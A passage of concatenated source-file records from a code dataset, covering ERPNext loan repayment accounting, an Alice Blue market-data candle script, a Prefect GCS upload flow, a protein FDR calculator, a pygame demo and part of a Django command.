0:\n\t\t\tself.principal_amount_paid += interest_paid\n\n\tdef make_gl_entries(self, cancel=0, adv_adj=0):\n\t\tgle_map = []\n\n\t\tif self.shortfall_amount and self.amount_paid > self.shortfall_amount:\n\t\t\tremarks = _(\"Shortfall Repayment of {0}.
    Repayment against Loan: {1}\").format(\n\t\t\t\tself.shortfall_amount, self.against_loan\n\t\t\t)\n\t\telif self.shortfall_amount:\n\t\t\tremarks = _(\"Shortfall Repayment of {0}\").format(self.shortfall_amount)\n\t\telse:\n\t\t\tremarks = _(\"Repayment against Loan:\") + \" \" + self.against_loan\n\n\t\tif self.repay_from_salary:\n\t\t\tpayment_account = self.payroll_payable_account\n\t\telse:\n\t\t\tpayment_account = self.payment_account\n\n\t\tif self.total_penalty_paid:\n\t\t\tgle_map.append(\n\t\t\t\tself.get_gl_dict(\n\t\t\t\t\t{\n\t\t\t\t\t\t\"account\": self.loan_account,\n\t\t\t\t\t\t\"against\": payment_account,\n\t\t\t\t\t\t\"debit\": self.total_penalty_paid,\n\t\t\t\t\t\t\"debit_in_account_currency\": self.total_penalty_paid,\n\t\t\t\t\t\t\"against_voucher_type\": \"Loan\",\n\t\t\t\t\t\t\"against_voucher\": self.against_loan,\n\t\t\t\t\t\t\"remarks\": _(\"Penalty against loan:\") + self.against_loan,\n\t\t\t\t\t\t\"cost_center\": self.cost_center,\n\t\t\t\t\t\t\"party_type\": self.applicant_type,\n\t\t\t\t\t\t\"party\": self.applicant,\n\t\t\t\t\t\t\"posting_date\": getdate(self.posting_date),\n\t\t\t\t\t}\n\t\t\t\t)\n\t\t\t)\n\n\t\t\tgle_map.append(\n\t\t\t\tself.get_gl_dict(\n\t\t\t\t\t{\n\t\t\t\t\t\t\"account\": self.penalty_income_account,\n\t\t\t\t\t\t\"against\": self.loan_account,\n\t\t\t\t\t\t\"credit\": self.total_penalty_paid,\n\t\t\t\t\t\t\"credit_in_account_currency\": self.total_penalty_paid,\n\t\t\t\t\t\t\"against_voucher_type\": \"Loan\",\n\t\t\t\t\t\t\"against_voucher\": self.against_loan,\n\t\t\t\t\t\t\"remarks\": _(\"Penalty against loan:\") + self.against_loan,\n\t\t\t\t\t\t\"cost_center\": self.cost_center,\n\t\t\t\t\t\t\"posting_date\": getdate(self.posting_date),\n\t\t\t\t\t}\n\t\t\t\t)\n\t\t\t)\n\n\t\tgle_map.append(\n\t\t\tself.get_gl_dict(\n\t\t\t\t{\n\t\t\t\t\t\"account\": payment_account,\n\t\t\t\t\t\"against\": self.loan_account + \", \" + self.penalty_income_account,\n\t\t\t\t\t\"debit\": self.amount_paid,\n\t\t\t\t\t\"debit_in_account_currency\": self.amount_paid,\n\t\t\t\t\t\"against_voucher_type\": \"Loan\",\n\t\t\t\t\t\"against_voucher\": self.against_loan,\n\t\t\t\t\t\"remarks\": remarks,\n\t\t\t\t\t\"cost_center\": self.cost_center,\n\t\t\t\t\t\"posting_date\": getdate(self.posting_date),\n\t\t\t\t}\n\t\t\t)\n\t\t)\n\n\t\tgle_map.append(\n\t\t\tself.get_gl_dict(\n\t\t\t\t{\n\t\t\t\t\t\"account\": self.loan_account,\n\t\t\t\t\t\"party_type\": self.applicant_type,\n\t\t\t\t\t\"party\": self.applicant,\n\t\t\t\t\t\"against\": payment_account,\n\t\t\t\t\t\"credit\": self.amount_paid,\n\t\t\t\t\t\"credit_in_account_currency\": self.amount_paid,\n\t\t\t\t\t\"against_voucher_type\": \"Loan\",\n\t\t\t\t\t\"against_voucher\": self.against_loan,\n\t\t\t\t\t\"remarks\": remarks,\n\t\t\t\t\t\"cost_center\": self.cost_center,\n\t\t\t\t\t\"posting_date\": getdate(self.posting_date),\n\t\t\t\t}\n\t\t\t)\n\t\t)\n\n\t\tif gle_map:\n\t\t\tmake_gl_entries(gle_map, cancel=cancel, adv_adj=adv_adj, merge_entries=False)\n\n\ndef create_repayment_entry(\n\tloan,\n\tapplicant,\n\tcompany,\n\tposting_date,\n\tloan_type,\n\tpayment_type,\n\tinterest_payable,\n\tpayable_principal_amount,\n\tamount_paid,\n\tpenalty_amount=None,\n\tpayroll_payable_account=None,\n):\n\n\tlr = frappe.get_doc(\n\t\t{\n\t\t\t\"doctype\": \"Loan Repayment\",\n\t\t\t\"against_loan\": loan,\n\t\t\t\"payment_type\": payment_type,\n\t\t\t\"company\": company,\n\t\t\t\"posting_date\": posting_date,\n\t\t\t\"applicant\": applicant,\n\t\t\t\"penalty_amount\": penalty_amount,\n\t\t\t\"interest_payable\": interest_payable,\n\t\t\t\"payable_principal_amount\": payable_principal_amount,\n\t\t\t\"amount_paid\": amount_paid,\n\t\t\t\"loan_type\": loan_type,\n\t\t\t\"payroll_payable_account\": payroll_payable_account,\n\t\t}\n\t).insert()\n\n\treturn lr\n\n\ndef get_accrued_interest_entries(against_loan, posting_date=None):\n\tif not posting_date:\n\t\tposting_date = getdate()\n\n\tunpaid_accrued_entries = frappe.db.sql(\n\t\t\"\"\"\n\t\t\tSELECT name, posting_date, interest_amount - paid_interest_amount as interest_amount,\n\t\t\t\tpayable_principal_amount - paid_principal_amount as payable_principal_amount,\n\t\t\t\taccrual_type\n\t\t\tFROM\n\t\t\t\t`tabLoan Interest Accrual`\n\t\t\tWHERE\n\t\t\t\tloan = %s\n\t\t\tAND posting_date <= %s\n\t\t\tAND (interest_amount - paid_interest_amount > 0 OR\n\t\t\t\tpayable_principal_amount - paid_principal_amount > 0)\n\t\t\tAND\n\t\t\t\tdocstatus = 1\n\t\t\tORDER BY posting_date\n\t\t\"\"\",\n\t\t(against_loan, posting_date),\n\t\tas_dict=1,\n\t)\n\n\treturn unpaid_accrued_entries\n\n\ndef get_penalty_details(against_loan):\n\tpenalty_details = frappe.db.sql(\n\t\t\"\"\"\n\t\tSELECT posting_date, (penalty_amount - total_penalty_paid) as pending_penalty_amount\n\t\tFROM `tabLoan Repayment` where posting_date >= (SELECT MAX(posting_date) from `tabLoan Repayment`\n\t\twhere against_loan = %s) and docstatus = 1 and against_loan = %s\n\t\"\"\",\n\t\t(against_loan, against_loan),\n\t)\n\n\tif penalty_details:\n\t\treturn penalty_details[0][0], flt(penalty_details[0][1])\n\telse:\n\t\treturn None, 0\n\n\ndef regenerate_repayment_schedule(loan, cancel=0):\n\tfrom erpnext.loan_management.doctype.loan.loan import (\n\t\tadd_single_month,\n\t\tget_monthly_repayment_amount,\n\t)\n\n\tloan_doc = frappe.get_doc(\"Loan\", loan)\n\tnext_accrual_date = None\n\taccrued_entries = 0\n\tlast_repayment_amount = 0\n\tlast_balance_amount = 0\n\n\tfor term in reversed(loan_doc.get(\"repayment_schedule\")):\n\t\tif not term.is_accrued:\n\t\t\tnext_accrual_date = term.payment_date\n\t\t\tloan_doc.remove(term)\n\t\telse:\n\t\t\taccrued_entries += 1\n\t\t\tif not last_repayment_amount:\n\t\t\t\tlast_repayment_amount = term.total_payment\n\t\t\tif not last_balance_amount:\n\t\t\t\tlast_balance_amount = term.balance_loan_amount\n\n\tloan_doc.save()\n\n\tbalance_amount = get_pending_principal_amount(loan_doc)\n\n\tif loan_doc.repayment_method == \"Repay Fixed Amount per Period\":\n\t\tmonthly_repayment_amount = flt(\n\t\t\tbalance_amount / len(loan_doc.get(\"repayment_schedule\")) - accrued_entries\n\t\t)\n\telse:\n\t\trepayment_period = loan_doc.repayment_periods - accrued_entries\n\t\tif not cancel and repayment_period > 0:\n\t\t\tmonthly_repayment_amount = get_monthly_repayment_amount(\n\t\t\t\tbalance_amount, loan_doc.rate_of_interest, repayment_period\n\t\t\t)\n\t\telse:\n\t\t\tmonthly_repayment_amount = last_repayment_amount\n\t\t\tbalance_amount = last_balance_amount\n\n\tpayment_date = next_accrual_date\n\n\twhile balance_amount > 0:\n\t\tinterest_amount = flt(balance_amount * flt(loan_doc.rate_of_interest) / (12 * 100))\n\t\tprincipal_amount = monthly_repayment_amount - interest_amount\n\t\tbalance_amount = flt(balance_amount + interest_amount - monthly_repayment_amount)\n\t\tif balance_amount < 0:\n\t\t\tprincipal_amount += balance_amount\n\t\t\tbalance_amount = 0.0\n\n\t\ttotal_payment = principal_amount + interest_amount\n\t\tloan_doc.append(\n\t\t\t\"repayment_schedule\",\n\t\t\t{\n\t\t\t\t\"payment_date\": payment_date,\n\t\t\t\t\"principal_amount\": principal_amount,\n\t\t\t\t\"interest_amount\": interest_amount,\n\t\t\t\t\"total_payment\": total_payment,\n\t\t\t\t\"balance_loan_amount\": balance_amount,\n\t\t\t},\n\t\t)\n\t\tnext_payment_date = add_single_month(payment_date)\n\t\tpayment_date = next_payment_date\n\n\tloan_doc.save()\n\n\ndef get_pending_principal_amount(loan):\n\tif loan.status in (\"Disbursed\", \"Closed\") or loan.disbursed_amount >= loan.loan_amount:\n\t\tpending_principal_amount = (\n\t\t\tflt(loan.total_payment)\n\t\t\t- flt(loan.total_principal_paid)\n\t\t\t- flt(loan.total_interest_payable)\n\t\t\t- flt(loan.written_off_amount)\n\t\t)\n\telse:\n\t\tpending_principal_amount = (\n\t\t\tflt(loan.disbursed_amount)\n\t\t\t- flt(loan.total_principal_paid)\n\t\t\t- flt(loan.total_interest_payable)\n\t\t\t- flt(loan.written_off_amount)\n\t\t)\n\n\treturn pending_principal_amount\n\n\n# This function returns the amounts that are payable at the time of loan repayment based on posting date\n# So it pulls all the unpaid Loan Interest Accrual Entries and calculates the penalty if applicable\n\n\ndef get_amounts(amounts, against_loan, posting_date):\n\tprecision = cint(frappe.db.get_default(\"currency_precision\")) or 2\n\n\tagainst_loan_doc = frappe.get_doc(\"Loan\", against_loan)\n\tloan_type_details = frappe.get_doc(\"Loan Type\", against_loan_doc.loan_type)\n\taccrued_interest_entries = get_accrued_interest_entries(against_loan_doc.name, posting_date)\n\n\tcomputed_penalty_date, pending_penalty_amount = get_penalty_details(against_loan)\n\tpending_accrual_entries = {}\n\n\ttotal_pending_interest = 0\n\tpenalty_amount = 0\n\tpayable_principal_amount = 0\n\tfinal_due_date = \"\"\n\tdue_date = \"\"\n\n\tfor entry in accrued_interest_entries:\n\t\t# Loan repayment due date is one day after the loan interest is accrued\n\t\t# no of late days are calculated based on loan repayment posting date\n\t\t# and if no_of_late days are positive then penalty is levied\n\n\t\tdue_date = add_days(entry.posting_date, 1)\n\t\tdue_date_after_grace_period = add_days(due_date, loan_type_details.grace_period_in_days)\n\n\t\t# Consider one day after already calculated penalty\n\t\tif computed_penalty_date and getdate(computed_penalty_date) >= due_date_after_grace_period:\n\t\t\tdue_date_after_grace_period = add_days(computed_penalty_date, 1)\n\n\t\tno_of_late_days = date_diff(posting_date, due_date_after_grace_period) + 1\n\n\t\tif (\n\t\t\tno_of_late_days > 0\n\t\t\tand (not against_loan_doc.repay_from_salary)\n\t\t\tand entry.accrual_type == \"Regular\"\n\t\t):\n\t\t\tpenalty_amount += (\n\t\t\t\tentry.interest_amount * (loan_type_details.penalty_interest_rate / 100) * no_of_late_days\n\t\t\t)\n\n\t\ttotal_pending_interest += entry.interest_amount\n\t\tpayable_principal_amount += entry.payable_principal_amount\n\n\t\tpending_accrual_entries.setdefault(\n\t\t\tentry.name,\n\t\t\t{\n\t\t\t\t\"interest_amount\": flt(entry.interest_amount, precision),\n\t\t\t\t\"payable_principal_amount\": flt(entry.payable_principal_amount, precision),\n\t\t\t},\n\t\t)\n\n\t\tif due_date and not final_due_date:\n\t\t\tfinal_due_date = add_days(due_date, loan_type_details.grace_period_in_days)\n\n\tpending_principal_amount = get_pending_principal_amount(against_loan_doc)\n\n\tunaccrued_interest = 0\n\tif due_date:\n\t\tpending_days = date_diff(posting_date, due_date) + 1\n\telse:\n\t\tlast_accrual_date = get_last_accrual_date(against_loan_doc.name)\n\t\tpending_days = date_diff(posting_date, last_accrual_date) + 1\n\n\tif pending_days > 0:\n\t\tprincipal_amount = flt(pending_principal_amount, precision)\n\t\tper_day_interest = get_per_day_interest(\n\t\t\tprincipal_amount, loan_type_details.rate_of_interest, posting_date\n\t\t)\n\t\tunaccrued_interest += pending_days * per_day_interest\n\n\tamounts[\"pending_principal_amount\"] = flt(pending_principal_amount, precision)\n\tamounts[\"payable_principal_amount\"] = flt(payable_principal_amount, precision)\n\tamounts[\"interest_amount\"] = flt(total_pending_interest, precision)\n\tamounts[\"penalty_amount\"] = flt(penalty_amount + pending_penalty_amount, precision)\n\tamounts[\"payable_amount\"] = flt(\n\t\tpayable_principal_amount + total_pending_interest + penalty_amount, precision\n\t)\n\tamounts[\"pending_accrual_entries\"] = pending_accrual_entries\n\tamounts[\"unaccrued_interest\"] = flt(unaccrued_interest, precision)\n\n\tif final_due_date:\n\t\tamounts[\"due_date\"] = final_due_date\n\n\treturn amounts\n\n\n@frappe.whitelist()\ndef calculate_amounts(against_loan, posting_date, payment_type=\"\"):\n\tamounts = {\n\t\t\"penalty_amount\": 0.0,\n\t\t\"interest_amount\": 0.0,\n\t\t\"pending_principal_amount\": 0.0,\n\t\t\"payable_principal_amount\": 0.0,\n\t\t\"payable_amount\": 0.0,\n\t\t\"unaccrued_interest\": 0.0,\n\t\t\"due_date\": \"\",\n\t}\n\n\tamounts = get_amounts(amounts, against_loan, posting_date)\n\n\t# update values for closure\n\tif payment_type == \"Loan Closure\":\n\t\tamounts[\"payable_principal_amount\"] = amounts[\"pending_principal_amount\"]\n\t\tamounts[\"interest_amount\"] += amounts[\"unaccrued_interest\"]\n\t\tamounts[\"payable_amount\"] = (\n\t\t\tamounts[\"payable_principal_amount\"] + amounts[\"interest_amount\"] + amounts[\"penalty_amount\"]\n\t\t)\n\n\treturn amounts\n","repo_name":"RafMo20D/erpnext-ksa-op","sub_path":"erpnext/loan_management/doctype/loan_repayment/loan_repayment.py","file_name":"loan_repayment.py","file_ext":"py","file_size_in_byte":23592,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"36218907034","text":"import datetime\nimport time\nimport threading\nfrom alice_blue import *\nimport pandas as pd\nfrom config import Credentials\n# To make django-models work outside django\nimport sys\nimport os\nimport django\n\nsys.path.append(\"/Users/nitishgupta/Desktop/algotradersonline/backend/src\")\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'backend.settings')\ndjango.setup()\nfrom optionchain.models import LTP\nfrom strategiesAPI.models import OneMIN\n\nSCRIPT_LIST = [\n 'ACC', 'ADANIENT', 'ADANIPORTS', 'AMBUJACEM', 'APOLLOHOSP', 'ASIANPAINT', 'AUBANK',\n 'AUROPHARMA', 'AXISBANK', 'BAJAJ-AUTO', 'BAJFINANCE', 'BATAINDIA', 'BHARATFORG',\n 'BHARTIARTL', 'BIOCON', 'BPCL', 'CHOLAFIN', 'CIPLA', 'COALINDIA', 'COFORGE', 'DABUR',\n 'DIVISLAB', 'DLF', 'DRREDDY', 'EICHERMOT', 'GODREJCP', 'GODREJPROP', 'GRASIM', 'HAVELLS',\n 'HCLTECH', 'HDFC', 'HDFCBANK', 'HDFCLIFE', 'HEROMOTOCO', 'HINDALCO', 'HINDPETRO',\n 'HINDUNILVR', 'ICICIBANK', 'ICICIPRULI', 'IGL', 'INDIGO', 'INDUSINDBK', 'INFY',\n 'IRCTC', 'ITC', 'JINDALSTEL', 'JSWSTEEL', 'JUBLFOOD', 'KOTAKBANK', 'LICHSGFIN',\n 'LT', 'LTI', 'LUPIN', 'M&M', 'MARUTI', 'MINDTREE', 'MUTHOOTFIN',\n 'PEL', 'PIDILITIND', 'PVR', 'RELIANCE', 'SBICARD', 'SBILIFE', 'SBIN', 'SRF',\n 'SRTRANSFIN', 'SUNPHARMA', 'TATACHEM', 'TATACONSUM', 'TATAMOTORS', 'TATAPOWER',\n 'TATASTEEL', 'TCS', 'TECHM', 'TITAN', 'TVSMOTOR', 'UPL', 'VEDL', 'VOLTAS', 'WIPRO',\n 'ZEEL']\n\nsocket_opened = False\ndf = pd.DataFrame()\ndf_final = pd.DataFrame()\nORB_timeFrame = 60 # in seconds\nx = 1\n\nbank = \"\"\nnifty = \"\"\n\n\ndef login():\n global bank\n global nifty\n session_id = AliceBlue.login_and_get_sessionID(\n username=Credentials.UserName.value,\n password=Credentials.PassWord.value,\n twoFA=Credentials.TwoFA.value,\n api_secret=Credentials.SecretKey.value,\n app_id=Credentials.AppId.value)\n alice = AliceBlue(username=Credentials.UserName.value,\n session_id=session_id)\n\n # alice.start_websocket(subscribe_callback=event_handler_quote_update)\n # alice.subscribe([\n # alice.get_instrument_by_symbol('NSE', i.upper() + '-EQ') for i in SCRIPT_LIST\n # ], LiveFeedType.TICK_DATA)\n #\n # alice.subscribe(alice.get_instrument_by_symbol('NSE', 'NIFTY 50'),\n # LiveFeedType.TICK_DATA)\n #\n # alice.subscribe(alice.get_instrument_by_symbol('NSE', 'NIFTY BANK'),\n # LiveFeedType.TICK_DATA)\n # alice.subscribe(alice.get_instrument_by_symbol('NSE', 'INDIA VIX'),\n # LiveFeedType.TICK_DATA)\n # print(alice.search_instruments('NFO', 'NIFTY'))\n\n # Get monthly and weekly expiry\n df = pd.DataFrame(alice.search_instruments('NFO', 'BANKNIFTY'))\n df = df.filter(['expiry']) # Filter only expiry dates\n df.drop_duplicates(inplace=True) # keeping unique values\n df = df.sort_values(by=['expiry'], ascending=True)\n arr = df.to_numpy() # Converts it to a 2D array of size n x 1\n t = arr[0][0].month # Getting the month of the first date\n for i in range(0, len(arr)):\n if arr[i][0].month > t:\n break\n date = arr[i][0] # This will save the monthly expiry\n\n print(alice.get_instrument_for_fno(symbol = 'NIFTY2320218150PE'))\n # q = LTP.objects.get(name='Nifty Bank')\n # x = q.ltp\n # x = (int)(x / 100) * 100\n # for i in range(x - 1000, x + 1000, 100):\n # alice.subscribe(alice.get_instrument_for_fno(symbol='BANKNIFTY',\n # expiry_date=arr[0][0],\n # is_fut=False,\n # strike=i,\n # is_CE=False),\n # LiveFeedType.TICK_DATA)\n # alice.subscribe(alice.get_instrument_for_fno(symbol='BANKNIFTY',\n # expiry_date=arr[0][0],\n # is_fut=False,\n # strike=i,\n # is_CE=True),\n # LiveFeedType.TICK_DATA)\n #\n # q = LTP.objects.get(name='Nifty 50')\n # y = q.ltp\n # y = (int)(y / 100) * 100\n # for i in range(y - 1000, y + 1000, 100):\n # alice.subscribe(alice.get_instrument_for_fno(symbol='NIFTY',\n # expiry_date=arr[0][0],\n # is_fut=False,\n # strike=i,\n # is_CE=False),\n # LiveFeedType.TICK_DATA)\n # alice.subscribe(alice.get_instrument_for_fno(symbol='NIFTY',\n # expiry_date=arr[0][0],\n # is_fut=False,\n # strike=i,\n # is_CE=True),\n # LiveFeedType.TICK_DATA)\n\n\ndef event_handler_quote_update(message):\n global df\n global bank\n global nifty\n print(message)\n\n ltp = message['ltp']\n\n token = message['instrument'].token\n if token == 26000:\n instrument = \"Nifty 50\"\n elif token == 26009:\n instrument = \"Nifty Bank\"\n else:\n instrument = message['instrument'].symbol\n\n p, created = LTP.objects.get_or_create(name=instrument)\n p.ltp = ltp\n p.save()\n\n timestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\")\n exchange = message['instrument'].exchange\n\n if 'volume' in message:\n df_new = pd.DataFrame(\n {\n 'symbol': instrument,\n 'timestamp': timestamp,\n 'ltp': ltp,\n 'exchange': exchange,\n 'volume': message['volume']\n },\n index=[0])\n df = pd.concat([df, df_new], ignore_index=True)\n\n\ndef create_ohlc():\n start = time.time()\n global df\n copydf = df.copy(deep=True).drop_duplicates()\n df = df.iloc[0:0]\n get_ohlc(copydf)\n interval = ORB_timeFrame - (time.time() - start)\n print(\n f\"Next check will start after {interval} sec : {datetime.datetime.now()}\"\n )\n\n threading.Timer(interval, create_ohlc).start()\n\n\ndef get_ohlc(dataframe):\n grouped = dataframe.groupby('symbol')\n\n global df_final\n global x\n # book = load_workbook(\n # f'/home/vmadmin/Desktop/backend/day_data/{datetime.datetime.now().strftime(\"%Y-%m-%d\")}_1MIN.xlsx')\n # writer = pd.ExcelWriter(\n # f'/home/vmadmin/Desktop/backend/day_data/{datetime.datetime.now().strftime(\"%Y-%m-%d\")}_1MIN.xlsx',\n # engine='openpyxl')\n # writer.book = book\n # writer.sheets = {ws.title: ws for ws in book.worksheets}\n\n for name, group in grouped:\n group = group.sort_values('timestamp')\n timestamp = group['timestamp'].iloc[0]\n symbol = name\n volume = group['volume'].iloc[-1] - group['volume'].iloc[0]\n open = group['ltp'].iloc[0]\n close = group['ltp'].iloc[-1]\n high = group['ltp'].max()\n low = group['ltp'].min()\n exchange = group['exchange'].iloc[0]\n # atp = group['atp'].iloc[-1]\n q, created = OneMIN.objects.get_or_create(name=name)\n q.timestamp = timestamp\n q.volume = volume\n q.open = open\n q.close = close\n q.high = high\n q.low = low\n q.exchange = exchange\n # q.atp = atp\n q.save()\n data = {\n 'timestamp': timestamp,\n 'symbol': symbol,\n 'volume': volume,\n 'open': open,\n 'close': close,\n 'high': high,\n 'low': low,\n 'exchange': exchange,\n # 'atp':atp\n }\n\n df_append = pd.DataFrame(data, index=[0])\n # df_append.to_excel(writer, header=False, index=False, startrow=x, startcol=0)\n x += 1\n # writer.save()\n # book.close()\n\n\nif __name__ == '__main__':\n # while ((datetime.datetime.now().time() <= datetime.time(9, 14, 00))\n # or (datetime.datetime.now().time() >= datetime.time(22, 30, 00))):\n # pass\n\n login()\n main_interval = ORB_timeFrame - datetime.datetime.now().second\n\n print(\"start in \", main_interval)\n time.sleep(main_interval)\n create_ohlc()\n","repo_name":"nitishgupta08/algotradersonline","sub_path":"backend/src/live_candle_data/1_min_candle.py","file_name":"1_min_candle.py","file_ext":"py","file_size_in_byte":8443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40848991525","text":"import pandas as pd\nfrom prefect import flow, task\nfrom prefect_gcp import GcpCredentials\n\n\n@task(log_prints=True)\ndef get_file(dataset_url: str, typedict: dict) -> pd.DataFrame:\n df = pd.read_csv(dataset_url, engine=\"pyarrow\", dtype=typedict)\n print(df.info())\n print(len(df))\n return df\n\n\n@task(log_prints=True)\ndef write_gcs(df: pd.DataFrame, gcs_path: str) -> None:\n gcp_credentials_block = GcpCredentials.load(\n \"ny-rides-gcpcred-bucket\"\n ) # gcp-cred-file\")\n credentials = gcp_credentials_block.get_credentials_from_service_account()\n print(\"path \" + gcs_path)\n print(gcp_credentials_block.service_account_file)\n df.to_parquet(\n gcs_path,\n engine=\"pyarrow\",\n compression=\"snappy\",\n storage_options={\n \"token\": credentials\n }\n )\n\n\n@flow(log_prints=True)\ndef parquet_to_gcs():\n \"\"\"\n Experimental -try out things- download csv files from\n github, upload parquet files to gsc, using pandas for\n both tasks, while keeping the dtypes consistent among\n all files.\n \"\"\"\n typedict = {\n \"dispatching_base_num\": \"string\",\n \"pickup_datetime\": \"datetime64[ns]\",\n \"dropOff_datetime\": \"datetime64[ns]\",\n \"PUlocationID\": \"Int64\",\n \"DOlocationID\": \"Int64\",\n \"SR_Flag\": \"Int64\",\n \"Affiliated_base_number\": \"string\",\n }\n year = 2019\n service = \"fhv\"\n\n for month in range(1, 13):\n dataset_file = f\"{service}_tripdata_{year}-{month:02}\"\n dataset_url = f\"https://github.com/DataTalksClub/nyc-tlc-data/releases/download/{service}/{dataset_file}.csv.gz\"\n df = get_file(dataset_url, typedict)\n gcs_path = f\"gs://ny_rides_data_lake_mythic-plexus-375706/data/{service}/{service}_tripdata_{year}-{month:02}.parquet\"\n\n write_gcs(df, gcs_path)\n print(str(month) + \" done\")\n\n\nif __name__ == \"__main__\":\n parquet_to_gcs()\n","repo_name":"larsskaret/DataTalksClub_Data-Engineering","sub_path":"homework_week3/q8_web_to_gcs.py","file_name":"q8_web_to_gcs.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32451556568","text":"import csv\nimport sys\nimport subprocess\n\n\n\ndef analyze_results(csv_file):\n total_compute_time = 0\n num_correct = 0\n num_total = 0\n\n with open(csv_file, mode=\"r\") as file:\n reader = csv.DictReader(file)\n for row in reader:\n total_compute_time += float(row[\"Compute Time\"])\n num_total += 1\n if row[\"Correct\"] == \"True\":\n num_correct += 1\n\n if num_total > 0:\n average_compute_time = total_compute_time / num_total\n accuracy_percentage = (num_correct / num_total) * 100\n else:\n average_compute_time = 0\n accuracy_percentage = 0\n\n return average_compute_time, accuracy_percentage\n\n\n\nif __name__ == '__main__':\n\n if len(sys.argv) < 2:\n sys.exit(1)\n\n uid = sys.argv[1]\n time_elapsed = sys.argv[2]\n\n csv_file = f\"protocol_results~{uid}.csv\"\n output_file = f\"analysis_results~{uid}.txt\"\n\n average_compute_time, accuracy_percentage = analyze_results(csv_file)\n\n with open(output_file, mode=\"w\") as file:\n file.write(f\"Average Compute Time (per iteration): {round(average_compute_time * 1e9, -2)/1000} microseconds (100 ns precision) | {average_compute_time} seconds\\n\")\n file.write(f\"Total Time Elapsed: {time_elapsed} seconds\\n\")\n file.write(f\"Accuracy Percentage: {accuracy_percentage}%\")\n\n\n print(f\"\\tAnalysis results recorded in '{output_file}'\")\n\n\n\n\n\n\n\n\n\n\n","repo_name":"evan-kolberg/ASR-project","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14334769899","text":"import logging\nfrom typing import List, Dict, Optional\nfrom datetime import datetime\n\nimport numpy as np\n\nfrom . import helpers\nfrom . import entrapment\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef calculateProteinFDRs(proteinGroups, proteinScores):\n logger.info(\"Calculating protein group-level FDRs\")\n numDecoys, numEntrapments, numTargets = 0, 0, 0\n proteinGroupInfoList = list()\n for proteinGroup, proteinScore in zip(proteinGroups, proteinScores):\n if proteinScore == -100.0:\n break\n \n if helpers.isDecoy(proteinGroup):\n numDecoys += 1\n else:\n numTargets += 1\n if entrapment.isEntrapment(proteinGroup):\n numEntrapments += 1\n reportedFdr = (numDecoys + 1) / (numTargets + 1)\n observedFdr = (numEntrapments + 1) / (numTargets + 1)\n\n skipForCounting = helpers.isDecoy(proteinGroup) or helpers.isObsolete(proteinGroup)\n proteinGroupInfoList.append((reportedFdr, observedFdr, skipForCounting))\n \n logger.info(f\"Targets: {numTargets}, Decoys: {numDecoys}\")\n if numEntrapments > 1:\n logger.info(f\"Targets: {numTargets}, Entrapments: {numEntrapments}, Targets-Entrapments: {numTargets - numEntrapments}, Decoys: {numDecoys}\")\n \n if len(proteinGroupInfoList) == 0:\n raise Exception(\"No proteins with scores found, make sure that protein identifiers are consistent in the evidence and fasta files\")\n \n reportedFdrs, observedFdrs, skipForCounting = zip(*proteinGroupInfoList)\n reportedQvals, observedQvals = fdrsToQvals(reportedFdrs), fdrsToQvals(observedFdrs)\n logger.info(f\"#Target protein groups at 1% decoy FDR: {countBelowThreshold(reportedQvals, 0.01, skipForCounting)}\")\n if numEntrapments > 1:\n logger.info(f\"#Target protein groups at 1% entrapment FDR: {countBelowThreshold(observedFdrs, 0.01, skipForCounting)}\")\n logger.info(f\"Decoy FDR at 1% entrapment FDR: {'%.2g' % (reportedQvals[countBelowThreshold(observedFdrs, 0.01)])}\")\n logger.info(f\"Entrapment FDR at 1% decoy FDR: {'%.2g' % (observedFdrs[countBelowThreshold(reportedQvals, 0.01)])}\")\n \n #printReportedAndEntrapmentFDRs(reportedQvals, observedQvals)\n \n return reportedQvals, observedQvals\n\n\ndef printReportedAndEntrapmentFDRs(reportedQvals, observedQvals):\n import csv\n writer = csv.writer(open(f'protein_fdr_calibration_{datetime.now().strftime(\"%d%m%Y_%H%M%S\")}.txt', 'w'), delimiter = '\\t')\n for reportedQval, observedQval in zip(reportedQvals, observedQvals):\n writer.writerow([reportedQval, observedQval])\n\n\ndef fdrsToQvals(fdrs: List[float]) -> np.array:\n \"\"\"\n Makes a list of FDRs monotonically increasing (sometimes referred to as q-values after monotonization)\n \"\"\"\n return np.minimum.accumulate(fdrs[::-1])[::-1]\n\n\ndef countBelowThreshold(qvals: List[float], qvalThreshold: float, skipForCounting: Optional[List[bool]] = None):\n \"\"\"\n Counts number of q-values below a threshold, if skipForCounting are provided, only the targets are counted\n \"\"\"\n if skipForCounting is None:\n return len([1 for x in qvals if x < qvalThreshold])\n else:\n return len([1 for x, skip in zip(qvals, skipForCounting) if x < qvalThreshold and not skip])\n \n","repo_name":"kusterlab/picked_group_fdr","sub_path":"picked_group_fdr/fdr.py","file_name":"fdr.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"38566338320","text":"import pygame\r\nimport sys\r\nimport pygame.locals\r\n\r\npygame.init()\r\n\r\nsurface = pygame.display.set_mode( (300, 300) )\r\n\r\nsurface.fill( (255, 255, 255))\r\n\r\npygame.display.update()\r\n\r\nwhile True:\r\n\te = pygame.event.wait()\r\n\tif e.type == pygame.locals.QUIT:\r\n\t\tpygame.quit()\r\n\t\tsys.exit()\r\n\t\r\n","repo_name":"codenuri/PYTHON_BASIC","sub_path":"PYGAME1_TUTORIAL/pygame5_draw1.py","file_name":"pygame5_draw1.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38555860589","text":"from django.core.management.base import BaseCommand, CommandError\nfrom monitor.models import TrackedSite\nfrom optparse import make_option\nimport os\n\n\nclass Command(BaseCommand):\n\n help = \"\"\"Adds new sites from configuration file.\n The format of data should be : \\n\n url criteria\n url2 criteria2\n ...\n url5 criteria5\"\"\"\n\n option_list = BaseCommand.option_list + (\n make_option('--file',\n action='store',\n dest='file',\n default=False,\n help='Custom path to configuration 